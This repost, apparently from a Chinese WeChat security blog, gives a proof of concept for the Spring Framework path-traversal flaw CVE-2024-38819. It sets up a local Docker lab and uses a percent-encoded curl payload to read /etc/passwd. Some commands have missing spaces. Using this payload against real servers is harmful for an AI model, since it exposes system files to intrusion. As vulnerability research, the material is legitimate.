【🔔】互联网资料/工具,安全性未知,需要自行研判安全性。
CVE-2024-38819: PoC
Poc:
Poc环境验证
1. 构建镜像
doker 镜像(Spring Boot 3.3.4,基于 Spring Framework 6.1.13)
cd vuln
docker build -t cve-2024-38819-poc .
2. 运行服务
运行容器并将端口 8080 暴露给主机
docker run -d -p 8080:8080--name cve-2024-38819-poc cve-2024-38819-poc
3. 运行Poc
运行以下命令执行PoC并确认漏洞
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
如果攻击成功,就会显示 /etc/passwd 文件的内容。
Explanation
1. 使用以下代码创建 PathTraversalDemoApplication.java 以使用 RouterFunction 和 FileSystemResource 设置静态文件路由:
publicRouterFunction<ServerResponse> staticResourceRouter(){
returnRouterFunctions.resources("/static/**",newFileSystemResource("/app/static/"));
}
1. 将以下命令添加到 Dockerfile 以创建符号链接:
RUN ln -s /static/app/static/link
1. 创建一个有效负载,利用百分比编码通过符号链接遍历目录。
Path:`/static/link/%2e%2e/etc/passwd`
1. 使用以下 curl 命令执行PoC并验证攻击是否成功:
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
如果攻击成功,就会显示 /etc/passwd 文件的内容。
项目地址
-
1. 【仓库】https://github.com/masa42/CVE-2024-38819-POC
原文始发于微信公众号(埋藏酱油瓶):【Poc】-Spring Framework路径遍历漏洞(CVE-2024-38819)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论